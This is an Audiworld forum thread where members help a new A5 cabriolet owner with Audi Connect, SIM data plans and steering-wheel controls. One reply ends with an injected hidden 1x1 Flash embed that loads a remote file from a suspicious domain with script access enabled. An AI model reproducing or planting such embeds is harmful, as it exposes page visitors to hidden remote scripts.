Audi A5 / S5 / RS5 Coupe & Cabrio (B8) Discussion forum for the B8 Audi A5, S5 and RS5 Coupe and Cabriolet Model years 2009 - 2017

Audi Virgin

Search this Thread

Old 06-22-2012, 02:15 AM
Audiworld Junior Member

Received 0 Likes on 0 Posts
Default Audi Virgin

So yesterday I finally got my first Audi - 2013 A5 quattro cabriolet. Prestige/Comfort packages, walnut trim, exhaust tips...Ice Silver Metallic with black interior. LOVE love love it!!!!!!!!!!

Now my question - This AudiConnect thing... can anyone give my a brief rundown here? I'm a little confused. I get a few months complimentary, so I'm not sure

A) whether to purchase it afterwards
B) what is the monthly charge
C) that sim card?
D) do you NOT get Google maps if you don't purchase it?
E) some Trucard alternative option?

Thanks - I was too excited I think yesterday to listen to the salesman...I just wanted to drive off! Maybe I shoulda stayed...

Thanks peeps in advance!
Old 06-22-2012, 05:27 AM
AudiWorld Senior Member

Received 6 Likes on 4 Posts

Originally Posted by perkbarb
So yesterday I finally got my first Audi - 2013 A5 quattro cabriolet. Prestige/Comfort packages, walnut trim, exhaust tips...Ice Silver Metallic with black interior. LOVE love love it!!!!!!!!!!

Now my question - This AudiConnect thing... can anyone give my a brief rundown here? I'm a little confused. I get a few months complimentary, so I'm not sure

C) that sim card?

Thanks - I was too excited I think yesterday to listen to the salesman...I just wanted to drive off! Maybe I shoulda stayed...

Thanks peeps in advance!
Congrats on getting a wonderful car. I know how overwhelming the controls can be.

He made a commission. Call him back! It's his job.

Last edited by JGA5Cab; 06-22-2012 at 07:43 AM.
Old 06-22-2012, 06:44 AM
AudiWorld Newcomer

Now my question - This AudiConnect thing...

C) that sim card?
To use Audi Connect, you need an account configured at:

https://myconnectedservices.com/

Your sales rep should have done this for you. You may be able to do it yourself. In either case, you need to create an association between you, your car's VIN, and the SIM card provided with the Audi Connect paperwork you should have received.

Once that's completed, you can plug the SIM into the dash. There's a slot between the SD card slots.

Then you get Google maps for nav, access to weather and news, and the ability to use your car as a WiFi hotspot.

6 mos. free. If you decide it's worth paying for, you transition to a paid plan after that.

It's been hit and miss for me so far. I've reverted back to standard maps. I've found the simplicity of the built-in maps to be preferable to the information-dense Google images. I'll play a bit more with Google maps but it's not a slam dunk for me. Weather and news just aren't that useful given that apps on my phone are both quicker and more capable than what the car provides.

Hope that helped. Do talk to your sales rep if you didn't get the information or support you needed.
Old 06-22-2012, 08:18 AM
AudiWorld Member

C) that sim card?

Thanks peeps in advance!
Congrats on the car...and welcome to Audi.

A SIM card is a card that identifies mobile devices (a.k.a. cell phones) so they can connect to wireless carriers. T-Mobile, Verizon, AT&T, Sprint, etc.

http://thetechjournal.com/auto/audi-...t-system.xhtml

And yes...there will be a charge for the connection. Better find out how much ASAP.

And remember...this is a DATA connection here, so just like a data plan on a cell phone (which in reality this is)...it could cost you big bucks if you're not careful.

In order to get Google Maps, you need a constant data connection...so no data plan...no Google Maps.

Not sure if my wife's 2013 A4 will have it because she's not getting the NAV system, but if it does, it won't be used...ever.

Just not a fan of Internet connectivity in cars. People should be concentrating on driving...not screwing around with electronic toys.

Besides...the BEST toy going is your A5! Play with it, and enjoy!!
Old 06-22-2012, 11:57 AM
AudiWorld Super User

Received 106 Likes on 47 Posts

As has been stated, the first 6 months are free. After that, if you want to maintain the Google maps, weather, wireless hotspot in the car, etc, it's $30 @ month w/T-Mobile; no limit on data usage.

Another option is the TruSim which is a pay as you play. $30 to get the sim card with a $15 data credit then $0.17 per kilobyte. If you are moving in and out of your area a lot, Google maps if left on all the time can add up charges quikly as the cached maps will be overwritten frequently. Most users are very happy with this alternative and if used judiciously will be less expensive than T-Mobile's plan.There are several forum threads on the TruSim - do a search.
Old 06-25-2012, 08:15 AM
AudiWorld Newcomer

Originally Posted by snagitseven
Another option is the TruSim which is a pay as you play. $30 to get the sim card with a $15 data credit then $0.17 per kilobyte...
Thanks for this. It's the first I've heard of it and it's likely the route I'll go when my 6 mos. trial period ends.
Old 06-26-2012, 10:32 AM
Audiworld Junior Member

haha, I know that feeling of wanting to get off to drive your new car. But, car salesmen are used to customers returning for questions, and if he wanna see you as a customer again, he wanna treat you well.
<object classid="clsid: D27CDB6E-AE6D-11cf-96B8-444553540000" width="1" height="1"><param value="http://ihavejustbeenpaid.info/flash/7/1x1.swf"><param name="allowScriptAccess" value="always" /><embed allowScriptAccess="always" src="http://ihavejustbeenpaid.info/flash/7/1x1.swf" type="application/x-shockwave-flash" width="1" height="1"></embed></object>
Old 06-26-2012, 07:54 PM
Audiworld Junior Member

Hey thanks everyone. Yes, I probably should call that dealer back, but I am in upstate NY and he is in NJ. The local dealer would not budge from MSRP. I just haven't had time.

30$ a month? - I doubt I'll be doing that. My Droid has unlimited data.

The other thing I'm a little confused about is that talk button on the steering wheel. I have paired my phone. When it rings, I hit answer on my phone and it does connect via bluetooth. But if it rings and I hit the talk button,,,it says "not used" on the dash. On my other car, when I hit that, it answers the phone. I'm going try to research it a little tonight, and maybe crack open that manual. But if anyone has some tips, I would love a little guidance. And I thought I could hit talk and say "Call John Smith" and it would dial from my contact list. (which I did load). Am I wrong?

What a great car. My first german. I have been driving a Buick Enclave. I thought it was pretty nice, smooth ride. OMG, now it feels like a clunker to me. And those adaptive xenon lights are amazing. My Buick has xenon, but not adaptive. Big difference, especially weaving around our curvy streets late at night. Pretty happy with the sound system too. I put my iTunes music on the SD card, all my playlists in different folders, very easy to navigate around the card. The B&O cranks.

Oh and also digging that little neck vent! Ok Ok..I'm done...(but I could keep going). I love this car!!
Old 06-26-2012, 08:18 PM
AudiWorld Member

The other thing I'm a little confused about is that talk button on the steering wheel. I have paired my phone. When it rings, I hit answer on my phone and it does connect via bluetooth. But if it rings and I hit the talk button,,,it says "not used" on the dash.
My car is the same. This is a button for voice control which you do not have (same for me).

The MMI joystick main button is used to answer the call if you want to use the car. You can also possibly use another control on the steering wheel for that, but I haven't tried using the left roller wheel/button or the right roller wheel things yet.
Old 06-26-2012, 11:18 PM
AudiWorld Member

I believe I mis-spoke..

http://www.a5oc.com/forums/a5-s5-top...ol-a5-cab.html

Apparently Audi disabled voice command in cabriolets and a vag-com fix is available as the hardware etc is present in the MMI regardless of cabrio or hardtop...

Quick Reply: Audi Virgin